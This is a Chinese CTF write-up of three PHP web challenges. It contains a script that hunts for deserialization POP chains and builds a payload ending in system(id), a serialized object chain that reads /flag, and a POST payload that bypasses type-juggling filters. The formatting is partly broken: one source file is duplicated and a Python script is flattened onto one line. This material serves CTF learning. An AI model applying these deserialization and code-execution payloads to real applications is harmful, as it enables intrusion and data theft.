# 0x01 pop_master

打开题目

1
2
3
4
5
6
7
8
<?php
include"class.php";
//class.php.txt
highlight_file(__FILE__);
$a=$_GET['pop'];
$b=$_GET['argv'];
$class=unserialize($a);
$class->XXXXXX($b); //随机生成6位长度的函数

根据提示信息 下载源码

我滴个乖乖 2M 多的链 16 万行

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
class NXlGlW{
public $hGYbeeG;
public function HRD4CW($y3Cae){
eval($y3Cae);

}
public function C3akk9($MSL6W){
eval($MSL6W);

}
}


class qAARvi{
public $E0cUWyC;
public function GlSPMd($XHiV9){
$this->BrLVt = "GAVzp";
if(method_exists($this->E0cUWyC, 'YAF1Wt')) $this->E0cUWyC->YAF1Wt($XHiV9);
if(method_exists($this->E0cUWyC, 'KfVcH5')) $this->E0cUWyC->KfVcH5($XHiV9);

}
public function olsElL($t43I8){
$this->v35pY = "TNiWd";
eval($t43I8);

}
}
//......

函数名 类名随机 生成 最总链成 用 eval 执行 system (“cat /flag”);

太菜了不会写脚本 用手工找几十个就行了,有大佬会写脚本的教教我

贴一个 大佬的脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
<?php
include_once "class.php";

include_once "exp_1.php";
/**
*
* $arr = [
* new AAA(),
* new BBB(),
* ...
* ];
*
*/

$source = file_get_contents('class.php');
$fsource = preg_split('/' . PHP_EOL . '/', $source);

$evalfuncarr = [];
$popchain = [];
$i = [];

function isfuncblacklist($fname) {
$blacklist = ['MISVgg'];
foreach($blacklist as $b) {
if($b == $fname) {
return true;
}
}
return false;
}

foreach ($arr as $a) {
$methods=get_class_methods($a);
foreach ($methods as $method) {
$func = new ReflectionMethod($a, $method);
if(isfuncblacklist($func->name)) {
continue;
}
$f = $func->getFileName();
$start_line = $func->getStartLine() - 1;
$end_line = $func->getEndLine();
$length = $end_line - $start_line;
$body = implode(PHP_EOL, array_slice($fsource, $start_line, $length));
if(strstr($body, 'eval')){
array_push($evalfuncarr, array('class'=>$a, 'func'=>$method));
}
}
}

function getcaller($funcname) {
global $arr, $fsource, $blacklist;
foreach($arr as $a) {
$methods=get_class_methods($a);
foreach ($methods as $method) {
$func = new ReflectionMethod($a, $method);
if($func->name === $funcname) {
continue;
}
if(isfuncblacklist($func->name)) {
continue;
}
$f = $func->getFileName();
$start_line = $func->getStartLine() - 1;
$end_line = $func->getEndLine();
$length = $end_line - $start_line;
$body = implode(PHP_EOL, array_slice($fsource, $start_line, $length));
if(strstr($body, $funcname)){
return array(
'class' => $a,
'func' => $method
);
}
}
}
return NULL;
}

$finded = false;

foreach($evalfuncarr as $a) {
if($finded == true){
break;
}
$ret = $a;
$popchain = [];
while(1) {
$ret = getcaller($ret['func']);
if($ret == NULL) {
array_pop($popchain);
break;
}
array_push($popchain, $ret);
printf("\r[-] %s", $ret['func']);
// BrtDix
if($ret['func'] == 'BrtDix') {
printf("\n");
var_dump($popchain);
foreach($popchain as $p) {
printf("%s::%s -> ", get_class($p['class']), $p['func']);
};
// valid
valid($a, $popchain);
// $finded = true;
break;
}
}
}

function valid($evalfunc, $chain) {
$code = "<?php\n";
$code .= "include_once 'class.php';";
$code .= "\$e = new ".get_class($evalfunc['class'])."();\n";
for ($i=0; $i < sizeof($chain); $i++) {
$tmp = $chain[$i];
$propname = array_keys(get_object_vars($tmp['class']))[0];
$t = $i - 1;
$code .= "\$a{$i} = new ".get_class($tmp['class'])."();\n";
if($i == 0) {
$code .= "\$a{$i}->{$propname} = \$e;\n";
} else {
$code .= "\$a{$i}->{$propname} = \$a{$t};\n";
}
}
$m = sizeof($chain)-1;
$code .= "\$a{$m}->BrtDix('system(id);// ');";
echo $code;
echo "\n\n";
file_put_contents("test_".$evalfunc['func'].".php", $code);
}

# 0x02 [强网先锋] 赌徒

在这里插入图片描述
打开网站 看到一串提示信息,
www.zip 下载源码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
<meta charset="utf-8">
<?php
//hint is in hint.php
error_reporting(1);


class Start
{
public $name='guest';
public $flag='syst3m("cat 127.0.0.1/etc/hint");';

public function __construct(){
echo "I think you need /etc/hint . Before this you need to see the source code";
}

public function _sayhello(){
echo $this->name;
return 'ok';
}

public function __wakeup(){
echo "hi";
$this->_sayhello();
}
public function __get($cc){
echo "give you flag : ".$this->flag;
return ;
}
}

class Info
{
private $phonenumber=123123;
public $promise='I do';

public function __construct(){
$this->promise='I will not !!!!';
return $this->promise;
}

public function __toString(){
return $this->file['filename']->ffiillee['ffiilleennaammee'];
}
}

class Room
{
public $filename='/flag';
public $sth_to_set;
public $a='';

public function __get($name){
$function = $this->a;
return $function();
}

public function Get_hint($file){
$hint=base64_encode(file_get_contents($file));
echo $hint;
return ;
}

public function __invoke(){
$content = $this->Get_hint($this->filename);
echo $content;
}
}

if(isset($_GET['hello'])){
unserialize($_GET['hello']);
}else{
$hi = new Start();
}

?>
<meta charset="utf-8">
<?php
//hint is in hint.php
error_reporting(1);


class Start
{
public $name='guest';
public $flag='syst3m("cat 127.0.0.1/etc/hint");';

public function __construct(){
echo "I think you need /etc/hint . Before this you need to see the source code";
}

public function _sayhello(){
echo $this->name;
return 'ok';
}

public function __wakeup(){
echo "hi";
$this->_sayhello();
}
public function __get($cc){
echo "give you flag : ".$this->flag;
return ;
}
}

class Info
{
private $phonenumber=123123;
public $promise='I do';

public function __construct(){
$this->promise='I will not !!!!';
return $this->promise;
}

public function __toString(){
return $this->file['filename']->ffiillee['ffiilleennaammee'];
}
}

class Room
{
public $filename='/flag';
public $sth_to_set;
public $a='';

public function __get($name){
$function = $this->a;
return $function();
}

public function Get_hint($file){
$hint=base64_encode(file_get_contents($file));
echo $hint;
return ;
}

public function __invoke(){
$content = $this->Get_hint($this->filename);
echo $content;
}
}

if(isset($_GET['hello'])){
unserialize($_GET['hello']);
}else{
$hi = new Start();
}

?>

很明显反序列化 pop 链 最终执行 Get_hint file_get_contents 获得 flag

1
2
__invoke()  //当尝试以调用函数的方式调用一个对象时,__invoke() 方法会被自动调用。
__get() //当我们试图获取一个不可达属性时(比如private),类会自动调用__get函数。
1
2
start=》wakeup=》sayhello =》Info=》toString=》this->room=》get =>room=》invoke

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
<?php
class Start
{
public $name='guest';
public $flag='syst3m("cat 127.0.0.1/etc/hint");';
}
class info
{
public $promise;
}
class Room
{
public $filename='/flag';
public $sth_to_set;
public $a='';

}
$info = new info();
$start = new start();
$room = new Room();
$start->name = $info;
$start->name->file['filename']=$room;
$room->a = new room();
echo serialize($start);
/*
$st=new Start();
$st->name=new info();
$st->name->file['filename']=new Room();
$st->name->file['filename']->a=new Room();
print_r(serialize($st));
*/

记得要把 开头的 hi 去掉在解码啊~

# 0x03 [强⽹先锋] 寻宝

key1 常见绕过

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
<?php
header('Content-type:text/html;charset=utf-8');
highlight_file(__file__);


function filter($string){
$filter_word = array('php','flag','index','KeY1lhv','source','key','eval','echo','\$','\(','\.','num','html','\/','\,','\'','0000000');
$filter_phrase= '/'.implode('|',$filter_word).'/';
return preg_replace($filter_phrase,'',$string);
}


if($ppp){
unset($ppp);
}
$ppp['number1'] = "1";
$ppp['number2'] = "1";
$ppp['nunber3'] = "1";
$ppp['number4'] = '1';
$ppp['number5'] = '1';

extract($_POST);

$num1 = filter($ppp['number1']);
$num2 = filter($ppp['number2']);
$num3 = filter($ppp['number3']);
$num4 = filter($ppp['number4']);
$num5 = filter($ppp['number5']);


if(isset($num1) && is_numeric($num1)){
die("非数字");
}

else{

if($num1 > 1024){
echo "第一层";
if(isset($num2) && strlen($num2) <= 4 && intval($num2 + 1) > 500000){
echo "第二层";
if(isset($num3) && '4bf21cd' === substr(md5($num3),0,7)){
echo "第三层";
if(!($num4 < 0)&&($num4 == 0)&&($num4 <= 0)&&(strlen($num4) > 6)&&(strlen($num4) < 8)&&isset($num4) ){
echo "第四层";
if(!isset($num5)||(strlen($num5)==0)) die("no");
$b=json_decode(@$num5);
if($y = $b === NULL){
if($y === true){
echo "第五层";
include 'KeY1lhv.php';
echo $KEY1;
}
}else{
die("no");
}
}else{
die("no");
}
}else{
die("no");
}
}else{
die("no");
}
}else{
die("no111");
}
}
1
ppp[number1]=6666a&ppp[number2]=1e10&ppp[number3]=61823470&ppp[number4]=0abcdef&ppp[number5]=adada

第二个文件下载了,提示如下:
Mr.Smith 先生和 Tang 在 5 月份的时候在一个画展进行了接触,并且在某些地方写下了一些东西
我们将该月有关画展的信息做了汇总,希望你能够从中获取一些信息

压缩包用可以分段下载器都可以下载

文件中有五个图片 干扰我好久

最终发现 key2 以明文形式存在 docx 中

key2

贴出寻找脚本

1
import osfrom docx import Documentpath = r"C:\Users\xxxxx\Desktop\five_month"str_to_search = "KEY2"#input("请输入要搜索的字段:")def search_str_in_paragraph(str_to_search, paragraph):        str_index = paragraph.text.index(str_to_search)    return str_indexfor root, dirs, files in os.walk(path, topdown=False):    for file in files:        filename = file.split(".")[0]        ext = file.split(".")[1]        if ext == "docx":            doc = Document(os.path.join(root, file))            for paragraph in doc.paragraphs:                if str_to_search in paragraph.text:                    str_index = search_str_in_paragraph(str_to_search, paragraph)                    print(paragraph.text[str_index-10:str_index+10], "-----", filename, "-----", os.path.join(root, file))

在这里插入图片描述
![

](https://img-blog.csdnimg.cn/20210615112844856.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzM0MDk3NDk3,size_16,color_FFFFFF,t_70)

在这里插入图片描述